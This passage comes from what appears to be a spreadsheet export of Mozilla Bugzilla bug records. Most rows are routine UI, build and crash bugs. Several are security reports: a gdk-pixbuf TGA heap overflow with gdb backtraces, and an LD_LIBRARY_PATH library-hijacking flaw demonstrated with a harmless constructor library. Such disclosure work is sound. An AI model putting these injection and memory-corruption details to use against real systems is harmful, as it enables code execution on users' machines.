      </c>
      <c r="W3620" t="inlineStr">
        <is>
          <t>Currently the title strip is scrollable with the active page's title at the center. This is currently implemented across all devices. Change the title strip, on tablets, to match the design as shown here: http://cl.ly/image/3S3H1J1S3x0D</t>
        </is>
      </c>
      <c r="X3620" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3621">
      <c r="A3621" t="n">
        <v>655098</v>
      </c>
      <c r="B3621" t="inlineStr">
        <is>
          <t>2011-05-05 11:41:51 -0700</t>
        </is>
      </c>
      <c r="C3621" t="inlineStr">
        <is>
          <t>CreateNPObjectMember jsids don't appear to be rooted</t>
        </is>
      </c>
      <c r="D3621" t="inlineStr">
        <is>
          <t>2022-05-16 12:51:10 -0700</t>
        </is>
      </c>
      <c r="E3621" t="n">
        <v>1</v>
      </c>
      <c r="F3621" t="n">
        <v>1</v>
      </c>
      <c r="G3621" t="n">
        <v>6</v>
      </c>
      <c r="H3621" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3621" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J3621" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K3621" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3621" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3621" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N3621" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3621" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3621" t="inlineStr">
        <is>
          <t>[sg:critical?][qa-ntd-192][qa-]</t>
        </is>
      </c>
      <c r="Q3621" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3621" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3621" t="inlineStr">
        <is>
          <t>mozilla6</t>
        </is>
      </c>
      <c r="T3621" t="n">
        <v>1</v>
      </c>
      <c r="U3621" t="n">
        <v>0</v>
      </c>
      <c r="V3621" t="n">
        <v>19</v>
      </c>
      <c r="W3621" t="inlineStr">
        <is>
          <t>The jsid in CreateNPObjectMember may be a non-rooted identifier. http://mxr.mozilla.org/mozilla-central/source/dom/plugins/base/nsJSNPRuntime.cpp#2089
It should be traced at http://mxr.mozilla.org/mozilla-central/source/dom/plugins/base/nsJSNPRuntime.cpp#2292
But currently the JSAPI doesn't actually expose a public function for tracing jsid.
Filing as private becuase it's theoretically possible to abuse this via script to perhaps dereference string characters which were GCed.</t>
        </is>
      </c>
      <c r="X3621" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3622">
      <c r="A3622" t="n">
        <v>57210</v>
      </c>
      <c r="B3622" t="inlineStr">
        <is>
          <t>2000-10-18 16:47:26 -0700</t>
        </is>
      </c>
      <c r="C3622" t="inlineStr">
        <is>
          <t>If you have npjava32.dll in the Netscape 4.7x plugin dir, Mozilla crashes on startup</t>
        </is>
      </c>
      <c r="D3622" t="inlineStr">
        <is>
          <t>2022-05-16 12:51:10 -0700</t>
        </is>
      </c>
      <c r="E3622" t="n">
        <v>1</v>
      </c>
      <c r="F3622" t="n">
        <v>1</v>
      </c>
      <c r="G3622" t="n">
        <v>6</v>
      </c>
      <c r="H3622" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3622" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J3622" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K3622" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3622" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3622" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N3622" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3622" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3622" t="inlineStr">
        <is>
          <t>[FIX IN HAND][rtm++]</t>
        </is>
      </c>
      <c r="Q3622" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3622" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3622" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3622" t="n">
        <v>1</v>
      </c>
      <c r="U3622" t="n">
        <v>0</v>
      </c>
      <c r="V3622" t="n">
        <v>27</v>
      </c>
      <c r="W3622" t="inlineStr">
        <is>
          <t>As above.  The workaround is to rename npjava32.dll to something else before
starting Mozilla.  I can send my copy of npjava32.dll or my entire plugin
directory from Netscape if needed to reproduce this bug.
Netscape seems to be able to deal with renaming npjava32.dll so this is a
reasonable workaround.</t>
        </is>
      </c>
      <c r="X3622" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3623">
      <c r="A3623" t="n">
        <v>436966</v>
      </c>
      <c r="B3623" t="inlineStr">
        <is>
          <t>2008-06-02 18:00:25 -0700</t>
        </is>
      </c>
      <c r="C3623" t="inlineStr">
        <is>
          <t>should have an x86-64 linux tinderbox building mozilla-central</t>
        </is>
      </c>
      <c r="D3623" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E3623" t="n">
        <v>1</v>
      </c>
      <c r="F3623" t="n">
        <v>1</v>
      </c>
      <c r="G3623" t="n">
        <v>5</v>
      </c>
      <c r="H3623" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3623" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J3623" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3623" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L3623" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3623" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3623" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3623" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3623" t="inlineStr"/>
      <c r="Q3623" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3623" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3623" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3623" t="n">
        <v>1</v>
      </c>
      <c r="U3623" t="n">
        <v>0</v>
      </c>
      <c r="V3623" t="n">
        <v>17</v>
      </c>
      <c r="W3623" t="inlineStr">
        <is>
          <t>We have an x86-64 tbox on the 1.9 branch, but we don't have one on mozilla-central.</t>
        </is>
      </c>
      <c r="X3623" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3624">
      <c r="A3624" t="n">
        <v>137295</v>
      </c>
      <c r="B3624" t="inlineStr">
        <is>
          <t>2002-04-13 10:46:31 -0700</t>
        </is>
      </c>
      <c r="C3624" t="inlineStr">
        <is>
          <t>Gaps appear in gif images when not using back buffer on OS X</t>
        </is>
      </c>
      <c r="D3624" t="inlineStr">
        <is>
          <t>2002-10-28 14:54:29 -0800</t>
        </is>
      </c>
      <c r="E3624" t="n">
        <v>1</v>
      </c>
      <c r="F3624" t="n">
        <v>1</v>
      </c>
      <c r="G3624" t="n">
        <v>3</v>
      </c>
      <c r="H3624" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3624" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3624" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K3624" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3624" t="inlineStr">
        <is>
          <t>PowerPC</t>
        </is>
      </c>
      <c r="M3624" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3624" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3624" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3624" t="inlineStr">
        <is>
          <t>[adt1] [ETA 09/23]</t>
        </is>
      </c>
      <c r="Q3624" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3624" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3624" t="inlineStr">
        <is>
          <t>mozilla1.2beta</t>
        </is>
      </c>
      <c r="T3624" t="n">
        <v>1</v>
      </c>
      <c r="U3624" t="n">
        <v>0</v>
      </c>
      <c r="V3624" t="n">
        <v>86</v>
      </c>
      <c r="W3624" t="inlineStr">
        <is>
          <t>Build: 2002-04-12-08
Platform: OS X
Expected Results: Maximizing window should not cause painting issue with some of
the gif images.
What I got:
When the window is maximized (so no horizontal scrollbar is present), gaps
appear in the some of the gif images. I first thought this was a dup of
http://bugzilla.mozilla.org/show_bug.cgi?id=93170. 
However, no embedded content like flash, QT, or applets are present on this
page. Also, this is a regression starting with the 2002-04-12-08 build since it
works fine with the 2002-04-12-03 build.</t>
        </is>
      </c>
      <c r="X3624" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3625">
      <c r="A3625" t="n">
        <v>913957</v>
      </c>
      <c r="B3625" t="inlineStr">
        <is>
          <t>2013-09-08 13:25:55 -0700</t>
        </is>
      </c>
      <c r="C3625" t="inlineStr">
        <is>
          <t>The "enter username" screen needs styling</t>
        </is>
      </c>
      <c r="D3625" t="inlineStr">
        <is>
          <t>2013-09-17 10:09:37 -0700</t>
        </is>
      </c>
      <c r="E3625" t="n">
        <v>1</v>
      </c>
      <c r="F3625" t="n">
        <v>1</v>
      </c>
      <c r="G3625" t="n">
        <v>5</v>
      </c>
      <c r="H3625" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3625" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J3625" t="inlineStr">
        <is>
          <t>Users and Groups</t>
        </is>
      </c>
      <c r="K3625" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3625" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3625" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3625" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3625" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3625" t="inlineStr">
        <is>
          <t>u=user c=account p=1 s=2013.18 [needsverify]</t>
        </is>
      </c>
      <c r="Q3625" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3625" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3625" t="inlineStr">
        <is>
          <t>2013Q3</t>
        </is>
      </c>
      <c r="T3625" t="n">
        <v>1</v>
      </c>
      <c r="U3625" t="n">
        <v>0</v>
      </c>
      <c r="V3625" t="n">
        <v>9</v>
      </c>
      <c r="W3625" t="inlineStr">
        <is>
          <t>In the new Persona workflow we ask only for the username on our end, but the screen needs styling.</t>
        </is>
      </c>
      <c r="X3625" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3626">
      <c r="A3626" t="n">
        <v>1436071</v>
      </c>
      <c r="B3626" t="inlineStr">
        <is>
          <t>2018-02-06 08:08:48 -0800</t>
        </is>
      </c>
      <c r="C3626" t="inlineStr">
        <is>
          <t>Remove YUI</t>
        </is>
      </c>
      <c r="D3626" t="inlineStr">
        <is>
          <t>2018-03-08 13:14:35 -0800</t>
        </is>
      </c>
      <c r="E3626" t="n">
        <v>1</v>
      </c>
      <c r="F3626" t="n">
        <v>1</v>
      </c>
      <c r="G3626" t="n">
        <v>4</v>
      </c>
      <c r="H3626" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3626" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J3626" t="inlineStr">
        <is>
          <t>Webapp</t>
        </is>
      </c>
      <c r="K3626" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3626" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3626" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3626" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3626" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3626" t="inlineStr"/>
      <c r="Q3626" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3626" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3626" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3626" t="n">
        <v>1</v>
      </c>
      <c r="U3626" t="n">
        <v>0</v>
      </c>
      <c r="V3626" t="n">
        <v>2</v>
      </c>
      <c r="W3626" t="inlineStr">
        <is>
          <t>- Remove remaining YUI style code (if any)
- Remove YUI copyright notices
- Ensure E2E tests either have access to proper element ID’s, or are modified to pass with new selectors.</t>
        </is>
      </c>
      <c r="X3626" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3627">
      <c r="A3627" t="n">
        <v>1136397</v>
      </c>
      <c r="B3627" t="inlineStr">
        <is>
          <t>2015-02-24 14:06:25 -0800</t>
        </is>
      </c>
      <c r="C3627" t="inlineStr">
        <is>
          <t>[jsdbg2] Crash after resuming from breakpoint</t>
        </is>
      </c>
      <c r="D3627" t="inlineStr">
        <is>
          <t>2016-07-02 10:34:29 -0700</t>
        </is>
      </c>
      <c r="E3627" t="n">
        <v>1</v>
      </c>
      <c r="F3627" t="n">
        <v>1</v>
      </c>
      <c r="G3627" t="n">
        <v>3</v>
      </c>
      <c r="H3627" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3627" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3627" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K3627" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3627" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3627" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3627" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3627" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3627" t="inlineStr">
        <is>
          <t>[adv-main37+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q3627" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3627" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3627" t="inlineStr">
        <is>
          <t>mozilla39</t>
        </is>
      </c>
      <c r="T3627" t="n">
        <v>1</v>
      </c>
      <c r="U3627" t="n">
        <v>0</v>
      </c>
      <c r="V3627" t="n">
        <v>14</v>
      </c>
      <c r="W3627" t="inlineStr">
        <is>
          <t>STR:
1) Turn off parallel parsing in about:config to work around existing stupid problems in setting breakpoints.
2) Go to http://playcanv.as/p/JtL2iqIH and wait for it to load.
3) Find game.js, set a bp on line 158 inside setFuel.
4) Reload, wait for pause, then resume.
Socorro shows crash inside EnterBaselineAtBranch, like other crashes recently. I'll look into this promptly.</t>
        </is>
      </c>
      <c r="X3627" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3628">
      <c r="A3628" t="n">
        <v>1203078</v>
      </c>
      <c r="B3628" t="inlineStr">
        <is>
          <t>2015-09-09 04:52:11 -0700</t>
        </is>
      </c>
      <c r="C3628" t="inlineStr">
        <is>
          <t>Heap overflow and DoS with TGA files in gdk-pixbuf affecting Firefox</t>
        </is>
      </c>
      <c r="D3628" t="inlineStr">
        <is>
          <t>2024-05-30 09:05:21 -0700</t>
        </is>
      </c>
      <c r="E3628" t="n">
        <v>1</v>
      </c>
      <c r="F3628" t="n">
        <v>1</v>
      </c>
      <c r="G3628" t="n">
        <v>3</v>
      </c>
      <c r="H3628" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3628" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3628" t="inlineStr">
        <is>
          <t>Widget: Gtk</t>
        </is>
      </c>
      <c r="K3628" t="inlineStr">
        <is>
          <t>40 Branch</t>
        </is>
      </c>
      <c r="L3628" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3628" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3628" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3628" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3628" t="inlineStr">
        <is>
          <t>[gfx-noted][adv-main43+]</t>
        </is>
      </c>
      <c r="Q3628" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3628" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3628" t="inlineStr">
        <is>
          <t>mozilla43</t>
        </is>
      </c>
      <c r="T3628" t="n">
        <v>1</v>
      </c>
      <c r="U3628" t="n">
        <v>0</v>
      </c>
      <c r="V3628" t="n">
        <v>25</v>
      </c>
      <c r="W3628" t="inlineStr">
        <is>
          <t>Created attachment 8658661
overflow.tga.gz
User Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
Build ID: 20150826185918
Steps to reproduce:
Hello,
We found a heap overflow and a DoS in the gdk-pixbuf implementation triggered by the scaling of tga file. At least, these issues are affecting gdk-pixbuf 2.30 and 2.31 in x86_64 (we tested in a fully updated Ubuntu 14.04). Please find attached the two test cases as well as a minimal example of a vulnerable program: it is just a call to gdk_pixbuf_new_from_file_at_size.
As the last gdk-pixbuf vulnerability (https://bugzilla.gnome.org/show_bug.cgi?id=752297), this one also affects many programs including Firefox and Chromium since they are using gdk-pixbuf primitives to implement file pickers. To reproduce this issue in Firefox, you should attach one of the uncompressed tga or try to open them (using ctrl+O). The heap overflow PoC works in a fully updated Firefox 40 and it does *not* seem to depend on memory conditions (it was tested on my netbook as well as my desktop computer) so it is an interesting case from the exploitability perspective. Fortunately, Firefox 41 (beta) mitigates this heap overflow since images with large sizes are *not* scaled and the vulnerable code is not used (https://hg.mozilla.org/integration/mozilla-inbound/rev/10e77092a656). The DoS will work in all Firefox versions. The best way of solve these issues is to disable the TGA preview (i don't think people will complain about it).
Actual results:
It crashed.  A detailed backtrace of the heap overflow is here:
Starting program: pixbuf_vuln_poc overflow.tga
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Program received signal SIGSEGV, Segmentation fault.
scale_line (weights=weights@entry=0x2aab3c468c10, n_x=148, n_y=148, dest=dest@entry=0x630ee0 "", dest_x=dest_x@entry=0,
    dest_end=dest_end@entry=0x631144 "", dest_channels=dest_channels@entry=4, dest_has_alpha=dest_has_alpha@entry=1, src=src@entry=0x63ce60,
    src_channels=src_channels@entry=4, src_has_alpha=src_has_alpha@entry=1, x_init=&lt;optimized out&gt;, x_step=x_step@entry=9629110,
    src_width=src_width@entry=22627, check_size=check_size@entry=0, color1=color1@entry=0, color2=color2@entry=0) at pixops.c:974
974        
(gdb) bt
#0  scale_line (weights=weights@entry=0x2aab3c468c10, n_x=148, n_y=148, dest=dest@entry=0x630ee0 "", dest_x=dest_x@entry=0,
    dest_end=dest_end@entry=0x631144 "", dest_channels=dest_channels@entry=4, dest_has_alpha=dest_has_alpha@entry=1, src=src@entry=0x63ce60,
    src_channels=src_channels@entry=4, src_has_alpha=src_has_alpha@entry=1, x_init=&lt;optimized out&gt;, x_step=x_step@entry=9629110,
    src_width=src_width@entry=22627, check_size=check_size@entry=0, color1=color1@entry=0, color2=color2@entry=0) at pixops.c:974
#1  0x00002aaaaace5698 in pixops_process (dest_buf=&lt;optimized out&gt;, render_x0=0, render_y0=&lt;optimized out&gt;, render_x1=&lt;optimized out&gt;,
    render_y1=&lt;optimized out&gt;, dest_rowstride=&lt;optimized out&gt;, dest_channels=4, dest_has_alpha=1, src_buf=0x2aaaad14f010 "", src_width=22627,
    src_height=26435, src_rowstride=90508, src_channels=4, src_has_alpha=1, scale_x=&lt;optimized out&gt;, scale_y=&lt;optimized out&gt;, check_x=0, check_y=0,
    check_size=0, color1=0, color2=0, filter=0x7ffffffedc90, line_func=0x2aaaaace3c10 &lt;scale_line&gt;, pixel_func=0x2aaaaace49a0 &lt;scale_pixel&gt;)
    at pixops.c:1366
#2  0x00002aaaaace5f09 in _pixops_scale_real (interp_type=PIXOPS_INTERP_BILINEAR, interp_type@entry=PIXOPS_INTERP_NEAREST,
    scale_y=0,0068091545299791946, scale_x=0,0068060281964025283, src_has_alpha=1, src_channels=4, src_rowstride=90508, src_height=26435,
    src_width=22627, src_buf=0x2aaaad14f010 "", dest_has_alpha=1, dest_channels=4, dest_rowstride=616, render_y1=&lt;optimized out&gt;, render_x1=154,
    render_y0=&lt;optimized out&gt;, render_x0=0, dest_buf=&lt;optimized out&gt;) at pixops.c:2230
#3  _pixops_scale (dest_buf=&lt;optimized out&gt;, dest_width=dest_width@entry=154, dest_height=dest_height@entry=180, dest_rowstride=616, dest_channels=4,
    dest_has_alpha=1, src_buf=0x2aaaad14f010 "", src_width=22627, src_height=26435, src_rowstride=90508, src_channels=4, src_has_alpha=1,
    dest_x=dest_x@entry=0, dest_y=dest_y@entry=0, dest_region_width=dest_region_width@entry=154, dest_region_height=dest_region_height@entry=180,
    offset_x=offset_x@entry=0, offset_y=&lt;optimized out&gt;, scale_x=scale_x@entry=0,0068060281964025283, scale_y=scale_y@entry=0,0068091545299791946,
    interp_type=interp_type@entry=PIXOPS_INTERP_BILINEAR) at pixops.c:2285
#4  0x00002aaaaacdda2d in gdk_pixbuf_scale (src=0x618000, dest=0x618050, dest_x=0, dest_y=0, dest_width=154, dest_height=180, offset_x=0,
    offset_y=&lt;optimized out&gt;, scale_x=0,0068060281964025283, scale_y=0,0068091545299791946, interp_type=GDK_INTERP_BILINEAR) at gdk-pixbuf-scale.c:147
#5  0x00002aaaaacde07a in gdk_pixbuf_scale_simple (src=src@entry=0x618000, dest_width=154, dest_height=dest_height@entry=180,
    interp_type=interp_type@entry=GDK_INTERP_BILINEAR) at gdk-pixbuf-scale.c:321
#6  0x00002aaaaacdf340 in get_scaled_pixbuf (scaled=0x616440, pixbuf=0x618000) at gdk-pixbuf-scaled-anim.c:138
#7  0x00002aaaaacdae88 in gdk_pixbuf_new_from_file_at_scale (filename=0x7fffffffe36b "overflow.tga", width=&lt;optimized out&gt;, height=&lt;optimized out&gt;,
    preserve_aspect_ratio=&lt;optimized out&gt;, error=0x7fffffffdee0) at gdk-pixbuf-io.c:1377
#8  0x00000000004007b8 in main ()
(gdb) x/i $rip
=&gt; 0x2aaaaace3dd0 &lt;scale_line+448&gt;:        movzbl 0x3(%rcx),%edx
(gdb) info registers
rax            0x0        0
rbx            0x94        148
rcx            0x2aaa2d6d51c4        46910394945988
rdx            0x0        0
rsi            0x4        4
rdi            0x2aab3c468c10        46914939030544
rbp            0x2aab3c468e60        0x2aab3c468e60
rsp            0x7ffffffeda18        0x7ffffffeda18
r8             0x0        0
r9             0x0        0
r10            0x0        0
r11            0x0        0
r12            0x0        0
r13            0x63ce60        6540896
r14            0x2aab3c468c10        46914939030544
r15            0x94        148
rip            0x2aaaaace3dd0        0x2aaaaace3dd0 &lt;scale_line+448&gt;
eflags         0x10202        [ IF RF ]
cs             0x33        51
ss             0x2b        43
ds             0x0        0
es             0x0        0
fs             0x0        0
gs             0x0        0
And the backtrace of the DoS here:
Starting program: pixbuf_vuln_poc DoS.tga
[Depuración de hilo usando libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Program received signal SIGSEGV, Segmentation fault.
0x00002aaaacf4c384 in parse_data_for_row_pseudocolor (ctx=0x614ca0) at io-tga.c:367
367
(gdb) bt
#0  0x00002aaaacf4c384 in parse_data_for_row_pseudocolor (ctx=0x614ca0) at io-tga.c:367
#1  parse_data_for_row (err=0x7ffffffede28, ctx=0x614ca0) at io-tga.c:413
#2  gdk_pixbuf__tga_load_increment (data=0x614ca0, buffer=&lt;optimized out&gt;, size=&lt;optimized out&gt;, err=0x7ffffffede28) at io-tga.c:922
#3  0x00002aaaaacdca45 in gdk_pixbuf_loader_load_module (loader=loader@entry=0x60f200, image_type=image_type@entry=0x0,
    error=error@entry=0x7ffffffede28) at gdk-pixbuf-loader.c:445
#4  0x00002aaaaacdd2b8 in gdk_pixbuf_loader_close (loader=loader@entry=0x60f200, error=error@entry=0x7fffffffdef0) at gdk-pixbuf-loader.c:810
#5  0x00002aaaaacdae2a in gdk_pixbuf_new_from_file_at_scale (filename=0x7fffffffe370 "DoS.tga", width=&lt;optimized out&gt;, height=&lt;optimized out&gt;,
    preserve_aspect_ratio=&lt;optimized out&gt;, error=0x7fffffffdef0) at gdk-pixbuf-io.c:1372
#6  0x00000000004007b8 in main ()
(gdb) x/i $rip
=&gt; 0x2aaaacf4c384 &lt;gdk_pixbuf__tga_load_increment+612&gt;:        mov    0x8(%rdx),%rdx
(gdb) info registers
rax            0x6163e0        6382560
rbx            0x614ca0        6376608
rcx            0x7        7
rdx            0x0        0
rsi            0x611b02        6363906
rdi            0x618000        6389760
rbp            0x7ffffffede28        0x7ffffffede28
rsp            0x7ffffffedd80        0x7ffffffedd80
r8             0x616200        6382080
r9             0x6163e7        6382567
r10            0x8        8
r11            0x2aaaaaf05c10        46912500685840
r12            0x0        0
r13            0x0        0
r14            0x15        21
r15            0xb        11
rip            0x2aaaacf4c384        0x2aaaacf4c384 &lt;gdk_pixbuf__tga_load_increment+612&gt;
eflags         0x10202        [ IF RF ]
cs             0x33        51
ss             0x2b        43
ds             0x0        0
es             0x0        0
fs             0x0        0
gs             0x0        0</t>
        </is>
      </c>
      <c r="X3628" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3629">
      <c r="A3629" t="n">
        <v>590753</v>
      </c>
      <c r="B3629" t="inlineStr">
        <is>
          <t>2010-08-25 15:53:02 -0700</t>
        </is>
      </c>
      <c r="C3629" t="inlineStr">
        <is>
          <t>Insecure handling of LD_LIBRARY_PATH by run-mozilla.sh</t>
        </is>
      </c>
      <c r="D3629" t="inlineStr">
        <is>
          <t>2010-11-11 14:11:37 -0800</t>
        </is>
      </c>
      <c r="E3629" t="n">
        <v>1</v>
      </c>
      <c r="F3629" t="n">
        <v>1</v>
      </c>
      <c r="G3629" t="n">
        <v>3</v>
      </c>
      <c r="H3629" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3629" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3629" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3629" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3629" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3629" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3629" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3629" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3629" t="inlineStr">
        <is>
          <t>[sg:moderate]</t>
        </is>
      </c>
      <c r="Q3629" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3629" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3629" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3629" t="n">
        <v>1</v>
      </c>
      <c r="U3629" t="n">
        <v>0</v>
      </c>
      <c r="V3629" t="n">
        <v>10</v>
      </c>
      <c r="W3629" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; Linux x86_64; rv:2.0b5pre) Gecko/20100826 Firefox/4.0b5pre
Build Identifier: Mozilla/5.0 (X11; Linux x86_64; rv:2.0b5pre) Gecko/20100826 Firefox/4.0b5pre
Quoting ld-linux(8):
LD_LIBRARY_PATH
              A colon-separated list of directories in which to search for ELF libraries at execution-time.  Similar to the PATH environment variable.
All empty entries in LD_LIBRARY_PATH are treated like "." -- the current directory.  But an entirely empty LD_LIBRARY_PATH is not treated like "."  Having "." in LD_LIBRARY_PATH is pretty insecure, as it may lead to running arbitrary code.  Let's make a shared library:
$ cat lib.c
#include &lt;stdio.h&gt;
void my_init(void) __attribute__((constructor));
void my_init(void)
{
  printf("my_init()\n");
}
$ gcc -shared -fPIC lib.c -o librt.so.1
(/bin/ls and firefox-bin both depend on librt.so.1)
Running with empty LD_LIBRARY_PATH:
$ export LD_LIBRARY_PATH=
$ ls
lib.c  librt.so.1
Running with "." in LD_LIBRARY_PATH:
$ export LD_LIBRARY_PATH=.
$ ls
ls: ./librt.so.1: no version information available (required by ls)
my_init()
lib.c  librt.so.1
As you can see, standard /bin/ls program loaded librt.so.1 from current directory only the second time.
run-mozilla.sh changes LD_LIBRARY_PATH can add en empty entry to it if originally LD_LIBRARY_PATH was empty.  As all empty entries are equivalent to ".", we have a problem, because firefox will load libraries from current directory, while all other programs won't.
$ export LD_LIBRARY_PATH=
$ ls
lib.c  librt.so.1
$ ~/bin/firefox/firefox -no-remote -ProfileManager
